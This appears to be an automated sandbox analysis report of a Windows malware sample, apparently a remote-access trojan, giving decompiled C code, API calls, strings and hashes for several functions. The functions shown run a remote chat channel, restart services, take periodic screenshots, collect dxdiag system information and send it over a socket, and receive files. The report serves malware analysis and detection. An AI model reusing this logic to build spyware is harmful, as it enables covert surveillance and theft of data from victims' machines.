GetLastError.KERNEL32(?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004355EF
__dosmaperr.LIBCMT ref: 004355F6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435622
GetLastError.KERNEL32(?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043562C
__dosmaperr.LIBCMT ref: 00435633
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D39,?), ref: 00435676
GetLastError.KERNEL32(?,?,?,?,?,?,00401D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00435680
__dosmaperr.LIBCMT ref: 00435687
_free.LIBCMT ref: 00435693
_free.LIBCMT ref: 0043569A

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: dd6f3185e58a496e0aba07a6587b1c382c6770fb2a59ec2e03a733259c58d4aa
Instruction ID: b5d46763a30f5c02a0768ec9d988a2018c1f619f389f5c820b1df77af5e22da9
Opcode Fuzzy Hash: dd6f3185e58a496e0aba07a6587b1c382c6770fb2a59ec2e03a733259c58d4aa
Instruction Fuzzy Hash: 9F314A71400A0ABFDF01AFA5CC46DAF7B78EF08365F10416AF91896291DB39CD21CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004053ED, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004053ED(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t57;
				intOrPtr _t69;
				void* _t111;
				void* _t113;
				void* _t115;
				signed int _t117;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;

				_t125 = __eflags;
				_t101 = __edx;
				_t69 = _a4;
				E004020EC(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
				SetEvent( *(_t69 + 0x34));
				_t28 = L00401F95( &_v108);
				E004042A6( &_v108,  &_v60, 4, 0xffffffff);
				_t120 = (_t117 & 0xfffffff8) - 0x5c;
				E004020EC(_t69, _t120, _t101, _t125, 0x46c238);
				_t121 = _t120 - 0x18;
				E004020EC(_t69, _t121, _t101, _t125,  &_v76);
				E00417478( &_v140, _t101);
				_t122 = _t121 + 0x30;
				_t111 =  *_t28 - 0x3a;
				if(_t111 == 0) {
					L00401E49( &_v116, _t101, __eflags, 0);
					_t36 = E00402489();
					L00401F95(L00401E49( &_v120, _t101, __eflags, 0));
					_t101 = _t36;
					_t113 = E0040F69B();
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						L00401E74( &_v116, _t101);
						E00401FC7();
						E00401FC7();
						__eflags = 0;
						return 0;
					}
					 *0x46baec = E0040F931(_t113, "DisplayMessage");
					_t45 = E0040F931(_t113, "GetMessage");
					_t104 = "CloseChat";
					 *0x46bae4 = _t45;
					_t46 = E0040F931(_t113, "CloseChat");
					_t123 = _t122 - 0x18;
					 *0x46bae8 = _t46;
					 *0x46bae1 = 1;
					E004020EC(_t69, _t123, "CloseChat", __eflags, 0x46c2b8);
					_push(0x74);
					E00404AA4(_t69, _t69, _t104, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x46bae4(_t115,  &_v140);
					if(__eflags != 0) {
						_t123 = _t123 - 0x18;
						E004020AB(_t69, _t123, _t104, __eflags, _v140, _t51);
						_push(0x3b);
						E00404AA4(_t69, _t69, _t104, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t127 = _t111 != 1;
				if(_t111 != 1) {
					goto L7;
				}
				_t57 =  *0x46baec(L00401F95(L00401E49( &_v116, _t101, _t127, 0)));
				_t128 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E0040427F(_t69,  &_v80, 0x45f6b8);
				_t101 =  &_v84;
				E0041739C(_t69, _t122 - 0x18,  &_v84);
				_push(0x3b);
				E00404AA4(_t69, _t69,  &_v84, _t128);
				L00401EF0();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}

0x004053ed
0x004053ed
0x004053fb
0x00405404
0x0040540c
0x00405416
0x0040542a
0x0040542f
0x00405439
0x0040543e
0x00405448
0x00405451
0x00405456
0x00405459
0x0040545c
0x0040550b
0x00405512
0x00405525
0x0040552a
0x00405533
0x00405535
0x00405537
0x004054e0
0x004054e4
0x004054ed
0x004054f6
0x004054fd
0x00405503
0x00405503
0x0040554a
0x00405551
0x00405556
0x0040555b
0x00405562
0x00405567
0x0040556a
0x00405571
0x0040557d
0x00405582
0x00405586
0x0040558b
0x00405594
0x004055a4
0x004055a6
0x004055a8
0x004055b2
0x004055b7
0x004055bb
0x004055c6
0x004055c6
0x00000000
0x004055a6
0x00405462
0x00405465
0x00000000
0x00000000
0x0040547b
0x00405482
0x00405484
0x00000000
0x00000000
0x0040548f
0x00405497
0x0040549d
0x004054a2
0x004054a6
0x004054af
0x00000000
0x004054b4
0x004054cb
0x004054d6
0x004054d6
0x004054de
0x00000000
0x00000000
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 0040540C
GetMessageA.USER32 ref: 004054BC
TranslateMessage.USER32(?), ref: 004054CB
DispatchMessageA.USER32 ref: 004054D6
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 0040558E
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004055C6

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Strings

CloseChat, xrefs: 00405556
GetMessage, xrefs: 00405545
DisplayMessage, xrefs: 00405539

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: b8f8230bb179b2956526afa6d6b0b095e4ee809aa88c6e3b7f6ce2c6c49b1e73
Instruction ID: 33c0be49a712d0e34ef4d1a509f5b181f9b779c8c834d9e011c7c8049845a3e0
Opcode Fuzzy Hash: b8f8230bb179b2956526afa6d6b0b095e4ee809aa88c6e3b7f6ce2c6c49b1e73
Instruction Fuzzy Hash: DF41B371604300ABCA14FB76DD4A96F77A99B85704B40093FF911A75E2EF3C8909CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416472, Relevance: 15.1, APIs: 10, Instructions: 66
serviceCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00416472(char _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				int _t22;
				void* _t26;
				void* _t27;

				_t22 = 0;
				_t27 = OpenSCManagerW(0, 0, 0x11);
				_t26 = OpenServiceW(_t27, L00401EEB( &_a4), 0xf003f);
				if(_t26 != 0) {
					if(ControlService(_t26, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t26,  &_v32);
						} while (_v28 != 1);
						StartServiceW(_t26, 0, 0);
						asm("sbb ebx, ebx");
						_t22 = 3;
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
					} else {
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
						_t22 = 2;
					}
				} else {
					CloseServiceHandle(_t27);
				}
				L00401EF0();
				return _t22;
			}

0x0041647d
0x0041648f
0x0041649e
0x004164a2
0x004164bc
0x004164ce
0x004164d3
0x004164d9
0x004164e2
0x004164f1
0x004164f6
0x004164f9
0x004164fc
0x004164be
0x004164c5
0x004164c8
0x004164ca
0x004164ca
0x004164a4
0x004164a5
0x004164a5
0x00416501
0x0041650e

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00415E19,00000000), ref: 00416481
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00415E19,00000000), ref: 00416498
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164A5
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415E19,00000000), ref: 004164B4
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C8

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
Instruction ID: 9fe600a8707d0c96f8df9479574b059baa9e236c1ba3853f5d66e3923bac8ba5
Opcode Fuzzy Hash: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
Instruction Fuzzy Hash: 381182319403187BD721AF64DC89DFF3B7CDB45BA3700013AF90592192DB68DE46AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00441BEE, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00441BEE(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x457208) {
					E004401F5(_t52);
					_t26 = _a4;
				}
				E004401F5( *((intOrPtr*)(_t26 + 0x3c)));
				E004401F5( *((intOrPtr*)(_a4 + 0x30)));
				E004401F5( *((intOrPtr*)(_a4 + 0x34)));
				E004401F5( *((intOrPtr*)(_a4 + 0x38)));
				E004401F5( *((intOrPtr*)(_a4 + 0x28)));
				E004401F5( *((intOrPtr*)(_a4 + 0x2c)));
				E004401F5( *((intOrPtr*)(_a4 + 0x40)));
				E004401F5( *((intOrPtr*)(_a4 + 0x44)));
				E004401F5( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00441AB4(5,  &_v8);
				_v8 =  &_a4;
				return E00441B04(4,  &_v8);
			}

0x00441bf4
0x00441bf7
0x00441bff
0x00441c02
0x00441c07
0x00441c0a
0x00441c0e
0x00441c19
0x00441c24
0x00441c2f
0x00441c3a
0x00441c45
0x00441c50
0x00441c5b
0x00441c69
0x00441c71
0x00441c7a
0x00441c82
0x00441c96

APIs

_free.LIBCMT ref: 00441C02

Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 00441C0E
_free.LIBCMT ref: 00441C19
_free.LIBCMT ref: 00441C24
_free.LIBCMT ref: 00441C2F
_free.LIBCMT ref: 00441C3A
_free.LIBCMT ref: 00441C45
_free.LIBCMT ref: 00441C50
_free.LIBCMT ref: 00441C5B
_free.LIBCMT ref: 00441C69

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2bfa3934cf4ed12b4cce651615ad6e530ea0c4f31933f6cdbe87120bbe1bf93e
Instruction ID: 167aa965cb18310bd9f933f0fd8d2c8ac796a07d44e62cded6244bd04dd66799
Opcode Fuzzy Hash: 2bfa3934cf4ed12b4cce651615ad6e530ea0c4f31933f6cdbe87120bbe1bf93e
Instruction Fuzzy Hash: 9F11A775140148FFDB01FF99CC42CD93B65FF05354B0141AABB094B232DA36DA609B48

Uniqueness

Uniqueness Score: -1.00%

Function 00415938, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176
sleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00415938() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				E004510A8(E0045265E, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x46bea0 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					E004143BF(_t131);
					__imp__GdiplusStartup(0x46bea0, _t131, 0);
				}
				_t150 =  *0x46bd70 - _t92; // 0x0
				if(_t150 == 0) {
					L00401EFA(0x46c898, _t132, _t141, L00414E7E(_t146 - 0x40));
					L00401EF0();
				}
				_t42 = L00401F95(L00401E49(0x46c578, _t132, _t150, 0x19));
				_t45 = L00401EEB(E004172DA(_t146 - 0x58, L00401E49(0x46c578, _t132, _t150, 0x1a)));
				_t134 =  *_t42;
				L00401EFA(0x46c880,  *_t42, 0x46c880, E0041805B(_t146 - 0x40,  *_t42, _t45));
				L00401EF0();
				L00401EF0();
				CreateDirectoryW(L00401EEB(0x46c880), _t92);
				L00401F6D(_t92, _t146 - 0xb0);
				L00401F6D(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x46bd6b = 1;
				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L6:
				while(1) {
					if( *_t54 != 1) {
						L11:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						E00414398(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						L00401EFA(_t146 - 0x80, _t66, _t145, E004030A6(_t92, _t146 - 0x58, E004030A6(_t92, _t146 - 0x40, E00407514(_t146 - 0x98, 0x46c880, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
						L00401EF0();
						L00401EF0();
						L00401EF0();
						_t72 = L00401EEB(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E0041576E(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E00436769(_t75, L00401F95(L00401E49(0x46c578, _t134, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E00436769(_t79, L00401F95(L00401E49(0x46c578, _t134, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						_t83 = L00401F95(L00401E49(0x46c578, _t134, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E0040427F(_t92, _t148, _t83);
						_t85 = E00417ABF(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						Sleep(0x3e8);
					}
					goto L11;
				}
			}

0x0041593d
0x00415949
0x0041594b
0x0041594e
0x00415950
0x00415953
0x00415959
0x0041595b
0x0041595e
0x00415961
0x0041596f
0x0041596f
0x00415975
0x0041597b
0x0041598b
0x00415993
0x00415993
0x004159a8
0x004159c4
0x004159ca
0x004159dd
0x004159e5
0x004159ed
0x004159fb
0x00415a07
0x00415a0f
0x00415a14
0x00415a17
0x00415a28
0x00415a2e
0x00415a31
0x00415a34
0x00000000
0x00415a3a
0x00415a3d
0x00415a85
0x00415a89
0x00415a93
0x00415a98
0x00415a9d
0x00415aa2
0x00415aa7
0x00415ab5
0x00415aba
0x00415af9
0x00415b01
0x00415b09
0x00415b14
0x00415b1c
0x00415b24
0x00415b29
0x00415b36
0x00415b39
0x00415b57
0x00415b59
0x00415b70
0x00415b70
0x00415b3b
0x00415b4f
0x00415b4f
0x00415b78
0x00415b7a
0x00000000
0x00415b7a
0x00415a3f
0x00415a44
0x00415a47
0x00415a47
0x00415a49
0x00000000
0x00000000
0x00415a59
0x00415a5e
0x00415a64
0x00415a6b
0x00415a70
0x00415a73
0x00415a75
0x00415a7a
0x00000000
0x00000000
0x00415a81
0x00415a81
0x00000000
0x00415a47

APIs

__EH_prolog.LIBCMT ref: 0041593D
GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041596F

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

Part of subcall function 0041576E: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7
Part of subcall function 0041576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004159FB
Sleep.KERNEL32(000003E8), ref: 00415A81
GetLocalTime.KERNEL32(?), ref: 00415A89
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415B78

Strings

time_%04i%02i%02i_%02i%02i%02i, xrefs: 00415A23
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00415A1E, 00415A3F, 00415AAD

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 3280235481-3790400642
Opcode ID: dfda3036b7f4fdd4fe27100e21df2067ca75359026321bd74113c003ce21abe3
Instruction ID: a88af923db25c08f263845cfd4b3868e06691e543411564c9f1a5e85300975ae
Opcode Fuzzy Hash: dfda3036b7f4fdd4fe27100e21df2067ca75359026321bd74113c003ce21abe3
Instruction Fuzzy Hash: 89517F70A002589ACB14BBB6CC529FE77699F54308F00003FF845AB1E2EF3C5E8587A9

Uniqueness

Uniqueness Score: -1.00%

Function 0044FB34, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045067F), ref: 0044FB57

Strings

log10, xrefs: 0044FBA1, 0044FBF1
asin, xrefs: 0044FCC3
acos, xrefs: 0044FCCF
log, xrefs: 0044FBFD, 0044FC09
sqrt, xrefs: 0044FCDB
exp, xrefs: 0044FC1C, 0044FC7E
pow, xrefs: 0044FC3B, 0044FCE7, 0044FCFA

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 07e362d0d19a8e529bd48a8390fa6bde691843f4e6f9b00163a6e45181fcf7c8
Instruction ID: 6d1d00b5fa5106008f140815deedb413f1269aff938fee9e8c4187f401118692
Opcode Fuzzy Hash: 07e362d0d19a8e529bd48a8390fa6bde691843f4e6f9b00163a6e45181fcf7c8
Instruction Fuzzy Hash: A6515E70900A0DCBEF009F58E9885ADBBB4FB09305F6441A7D881A7755CB799D2D8B1E

Uniqueness

Uniqueness Score: -1.00%

Function 00413673, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00413673(void* __ecx, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t97 = __eflags;
				E004030A6(_t54,  &_v76, E0040427F(_t54,  &_v52, E0043987F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
				L00401EF0();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", L00401EEB(L00409E69( &_v52, L"/t ", 0,  &_v76)), 0, 0);
				L00401EF0();
				E004020D5(0,  &_v28);
				_t92 = 0;
				do {
					_t35 = L00401EEB( &_v76);
					_t87 =  &_v28;
					E004179DC(_t35,  &_v28);
					Sleep(0x64);
					_t92 = _t92 + 1;
				} while (L00409DB5() != 0 && _t92 < 0x4b0);
				if(L00409DB5() == 0) {
					DeleteFileW(L00401EEB( &_v76));
					E0040484E(_t55,  &_v180, 1);
					_t95 = _t94 - 0x10;
					_t93 = 0x46bacc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t46 = E00404A08(_t87);
					_t102 = _t46;
					if(_t46 != 0) {
						_t93 = _t95 - 0x18;
						L00402F93(_t55, _t95 - 0x18, L00402FB7( &_v52,  &_a4, 0x46c238), _t102,  &_v28);
						_push(0x97);
						E00404AA4(_t55,  &_v180, _t49, _t102);
						E00401FC7();
						E00404E0B( &_v180);
						_t55 = 1;
					}
					L00404E2F(_t55,  &_v180, _t93);
				}
				E00401FC7();
				L00401EF0();
				E00401FC7();
				return _t55;
			}

0x00413673
0x0041369d
0x004136a6
0x004136ab
0x004136d4
0x004136dd
0x004136e5
0x004136ea
0x004136ec
0x004136ef
0x004136f4
0x004136f9
0x00413700
0x00413709
0x0041370f
0x00413725
0x00413734
0x00413742
0x00413747
0x00413752
0x00413757
0x00413758
0x00413759
0x0041375a
0x0041375b
0x00413760
0x00413762
0x0041376a
0x00413782
0x00413788
0x00413793
0x0041379b
0x004137a6
0x004137ab
0x004137ab
0x004137b3
0x004137b3
0x004137bb
0x004137c3
0x004137cb
0x004137d8

APIs

Part of subcall function 00409E69: char_traits.LIBCPMT ref: 00409E79

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004136D4

Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9

Sleep.KERNEL32(00000064), ref: 00413700
DeleteFileW.KERNEL32(00000000), ref: 00413734

Strings

\sysinfo.txt, xrefs: 0041367F
temp, xrefs: 00413684
open, xrefs: 004136CE
/t , xrefs: 004136B3
dxdiag, xrefs: 004136C9

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$CreateDeleteExecuteShellSleepchar_traits
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 2701014334-2001430897
Opcode ID: 1bc4c19003b5507f43323b9d481384c89a8149bb09280e70437af5d3513d8734
Instruction ID: f4a0078ff742d4c0d57fd8ead3e50225e02e9f8c908c9e0bc41a8f95a638bb01
Opcode Fuzzy Hash: 1bc4c19003b5507f43323b9d481384c89a8149bb09280e70437af5d3513d8734
Instruction Fuzzy Hash: 15316F719102095BCB14FBA5DC92AEE7735AF50308F40007FF905771D2EF785E498A99

Uniqueness

Uniqueness Score: -1.00%

Function 004062D8, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004062D8(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				L00450D30();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E0040331A(0,  &_v48, __eflags, E00407514( &_v72,  &_a12, __eflags, L".part"));
				L00401EF0();
				_t37 = CreateFileW(L00401EEB( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = L00401EEB( &_a12);
					MoveFileW(L00401EEB( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = E00404B5A( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E004020AB(_t58, _t82, _t74, _t85,  &_v12, 8);
								E00404AA4(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(L00401EEB( &_v48));
						}
					}
				}
				L9:
				L00401EF0();
				L00401EF0();
				return _t58;
			}

0x004062e0
0x004062e9
0x004062ed
0x004062f0
0x004062f3
0x004062f5
0x00406302
0x0040630f
0x00406317
0x00406331
0x0040633a
0x0040633d
0x00406340
0x004063b2
0x004063b3
0x004063bc
0x004063cb
0x004063d1
0x00406342
0x00406342
0x00406345
0x00000000
0x00406347
0x00406347
0x0040634a
0x00000000
0x0040634c
0x0040634c
0x0040634c
0x0040635b
0x00406360
0x00406362
0x00406363
0x0040636a
0x00406379
0x0040637f
0x0040638a
0x00406394
0x0040639b
0x00000000
0x00000000
0x004063a3
0x004063a6
0x00000000
0x004063af
0x004063af
0x00000000
0x004063af
0x00000000
0x004063a6
0x004063ef
0x004063fe
0x004063fe
0x0040634a
0x00406345
0x004063d3
0x004063d6
0x004063de
0x004063eb

APIs

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406EAD,00000000), ref: 00406331
WriteFile.KERNEL32(?,?,00000000,00406EAD,00000000,?,000186A0,00406EAD,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 00406379
CloseHandle.KERNEL32(00000000,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 004063B3
MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
CloseHandle.KERNEL32(?,00000057,?,00000008,?,?,?,?,?,?,?,?,00000000), ref: 004063EF
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063FE

Strings

.part, xrefs: 004062FA
[Info], xrefs: 004062EC

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
String ID: .part$[Info]
API String ID: 820096542-3571004685
Opcode ID: ca82bc6b31bcb38aee6bd46f4e6acb32019e3c1c129d2b9990e42a317797f797
Instruction ID: 68dcce1d93323748b1337c278f552d509b85ae635904d8fd02d733045cb5952f
Opcode Fuzzy Hash: ca82bc6b31bcb38aee6bd46f4e6acb32019e3c1c129d2b9990e42a317797f797
Instruction Fuzzy Hash: E3314F71D00219ABCB00EFA5CC959EEB77DEF44345F10857AFD11B3191DA786A44CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAF4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040EAF4(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v28;
				intOrPtr _v36;
				intOrPtr* _t34;
